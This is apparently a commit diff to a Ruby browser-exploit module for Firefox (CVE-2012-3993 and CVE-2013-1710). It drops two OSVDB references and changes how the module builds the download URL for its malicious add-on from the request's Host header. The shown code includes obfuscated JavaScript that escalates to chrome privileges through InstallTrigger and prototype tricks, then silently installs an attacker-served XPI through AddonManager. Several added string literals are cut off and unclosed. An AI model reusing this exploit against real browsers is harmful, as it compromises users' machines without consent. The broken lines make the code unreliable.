@@ -45,10 +45,8 @@ def initialize(info = {})
4545 'DisclosureDate' => "Aug 6 2013" ,
4646 'References' => [
4747 [ 'CVE' , '2012-3993' ] , # used to install function that gets called from chrome:// (ff<15)
48- [ 'OSVDB' , '86111' ] ,
4948 [ 'URL' , 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101' ] ,
5049 [ 'CVE' , '2013-1710' ] , # used to peek into privileged caller's closure (ff<23)
51- [ 'OSVDB' , '96019' ]
5250 ] ,
5351 'BrowserRequirements' => {
5452 :source => 'script' ,
@@ -68,17 +66,26 @@ def on_request_exploit(cli, request, target_info)
6866 send_response ( cli , generate_addon_xpi ( cli ) . pack , { 'Content-Type' => 'application/x-xpinstall' } )
6967 else
7068 print_status ( "Sending HTML" )
71- send_response_html ( cli , generate_html ( target_info ) )
69+ res = generate_html ( target_info , request . headers [ 'Host' ] )
70+ vprint_status res . to_s
71+ send_response_html ( cli , res )
7272 end
7373 end
7474
75- def generate_html ( target_info )
75+ def generate_html ( target_info , refer )
7676 injection = if target_info [ :ua_ver ] . to_i == 15
7777 "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
7878 else
7979 "p2.constructor.defineProperty(obj,key,{get:runme});"
8080 end
8181
82+ if refer . nil? or refer . blank?
83+ redirect = "#{ get_module_uri }
84+ else
85+ proto = ( ( datastore [ 'SSL' ] ) ? 'https' : 'http' )
86+ redirect = "#{ proto } #{ refer } #{ get_module_resource }
87+ end
88+
8289 script = js_obfuscate %Q|
8390 try{InstallTrigger.install(0)}catch(e){p=e;};
8491 var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
@@ -107,7 +114,7 @@ def generate_html(target_info)
107114 js_payload = js_obfuscate %Q|
108115 if (!window.done) {
109116 window.AddonManager.getInstallForURL(
110- '#{ get_module_uri } /addon.xpi ',
117+ '#{ redirect }
111118 function(install) { install.install() },
112119 'application/x-xpinstall'
113120 );
0 commit comments